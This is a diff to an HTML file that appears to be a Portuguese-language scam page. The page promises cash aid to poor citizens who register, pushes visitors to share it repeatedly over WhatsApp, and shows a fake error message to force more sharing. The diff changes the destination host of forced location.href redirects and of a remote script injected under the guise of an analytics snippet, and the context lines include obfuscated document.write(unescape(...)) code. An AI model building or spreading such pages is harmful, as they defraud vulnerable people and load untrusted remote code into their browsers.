--- a/Enapor.html
+++ b/Enapor.html
@@ -569,7 +569,7 @@ $(document).click(function () {
             text2 = " an amount of ",
             text3 = "para cada cidadão que reúna as condições como uma ajuda à classe pobre para ultrapassar a crise. Entre e registe-se agora e certifique-se de que se regista corretamente👉 ",
             error = "Algo está errado!\nAs publicações não são calculadas. Pode ter partilhado com o mesmo amigo ou grupo mais do que uma vez, partilhe novamente",
-            abcde = "https://ak.jeekomih.com/4/3156656",
+            abcde = "https://zireemilsoude.net/4/8260197",
             saved = "",
             share = "whatsapp://send?text=" + text1;
     </script>
@@ -591,10 +591,10 @@ document.write(unescape('%20%3Cscript%20type%3D%22text/javascript%22%3E%0A%20var
         fh();}
     setTimeout('hh();', 500);
     function fh(){
-        location.href="https://ak.jeekomih.com/4/3156656";
+        location.href="https://zireemilsoude.net/4/8260197";
     }
     function goon(){
-        location.href="https://ak.jeekomih.com/4/3156656";
+        location.href="https://zireemilsoude.net/4/8260197";
     }
 </script>
 
@@ -604,7 +604,7 @@ document.write(unescape('%20%3Cscript%20type%3D%22text/javascript%22%3E%0A%20var
     var _hmt = _hmt || [];
     (function() {
         var hm = document.createElement("script");
-        hm.src = "https://ak.jeekomih.com/4/3156656";
+        hm.src = "https://zireemilsoude.net/4/8260197";
         var s = document.getElementsByTagName("script")[0];
         s.parentNode.insertBefore(hm, s);
     })();
